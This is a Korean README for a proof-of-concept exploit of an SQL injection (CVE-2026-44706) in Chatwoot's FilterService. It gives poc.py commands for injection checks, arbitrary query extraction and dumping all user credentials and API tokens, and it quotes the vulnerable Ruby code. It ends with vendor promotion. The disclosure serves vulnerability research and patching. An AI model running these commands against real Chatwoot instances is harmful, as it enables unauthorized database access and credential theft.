
Chatwoot FilterService의 SQL 인젝션
CVE-2026-44706에 대한 개념 증명 익스플로잇입니다. Chatwoot의 FilterService#lt_gt_filter_values에 존재하는 SQL 인젝션 취약점으로, 인증된 모든 에이전트가 사용자 자격 증명 및 API 토큰을 포함한 전체 PostgreSQL 데이터베이스를 읽을 수 있습니다. 전체 기사는 여기에서 확인하세요.
사용법:
# 인젝션 확인 (boolean 기반)
$ python3 poc.py --url http://TARGET --token TOKEN --account-id 1 --mode check
# 시간 기반 확인
$ python3 poc.py --url http://TARGET --token TOKEN --account-id 1 --mode timebased
# 임의 SQL 쿼리 결과 추출
$ python3 poc.py --url http://TARGET --token TOKEN --account-id 1 --mode extract --query "SELECT version()"
# 모든 사용자 자격 증명 및 API 토큰 덤프
$ python3 poc.py --url http://TARGET --token TOKEN --account-id 1 --mode creds
app/services/filter_service.rb (라인 91)에서 사용자 입력이 매개변수화 없이 SQL에 직접 삽입됩니다:
def lt_gt_filter_values(query_hash)
value = query_hash['values'][0] # ← 사용자 입력, 검증 없음
operator = query_hash['filter_operator'] == 'is_less_than' ? '<' : '>'
"#{operator} '#{value}'::#{attribute_data_type}" # ← 원시 삽입
end
클래스의 다른 모든 연산자는 바인드 매개변수(:value_N)를 사용합니다. is_greater_than과 is_less_than만 취약합니다.
POST /api/v1/accounts/:id/conversations/filterPOST /api/v1/accounts/:id/contacts/filterCWE-89 SQL 인젝션. 인증된 모든 에이전트/관리자는 다음을 수행할 수 있습니다:
pg_sleep()을 사용하여 데이터베이스 연결을 소진8.8 높음 CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
이 도구는 교육 및 연구 목적으로만 사용됩니다. 소유하고 있거나 명시적 테스트 허가를 받은 시스템에서만 사용하십시오. 저자는 이 프로그램의 오용이나 손해에 대해 책임을 지지 않습니다.
QuimeraX Intelligence는 복잡한 시스템의 중요한 취약점을 식별하는 데 특화된 고급 EASM 및 사이버 위협 인텔리전스 플랫폼입니다. 이 플랫폼은 보안 위협을 사전 예방적으로 모니터링, 탐지 및 경고하여 투명성을 보장하고 잠재적 위험에 신속하게 대응합니다. 클라이언트 시스템이 취약한 것으로 확인되면 즉시 알림과 포괄적인 보고서를 받아 보호 조치를 취할 수 있습니다. 자세히 알아보기
Hakai Security는 보안 전문가가 설립한 사이버 보안 회사로, 기술적 우수성에 전념합니다. 우리는 고급 침투 테스트, 현실적인 레드 팀 시뮬레이션 및 안전한 개발 관행을 포함한 맞춤형 보안 솔루션을 제공하여 진화하는 사이버 위협으로부터 고객의 자산을 사전에 보호합니다.
Hacking Club은 실무 경험이 풍부한 보안 컨설팅 회사의 전문가가 만든 실습형 강의, 실습실 및 과제를 통해 사이버 보안을 배우는 교육 플랫폼입니다. 전장에서 바로 여러분의 훈련으로 이어집니다. Hacking Club에서 이 저장소에 제시된 취약점을 연습해 보세요! 자세히 알아보기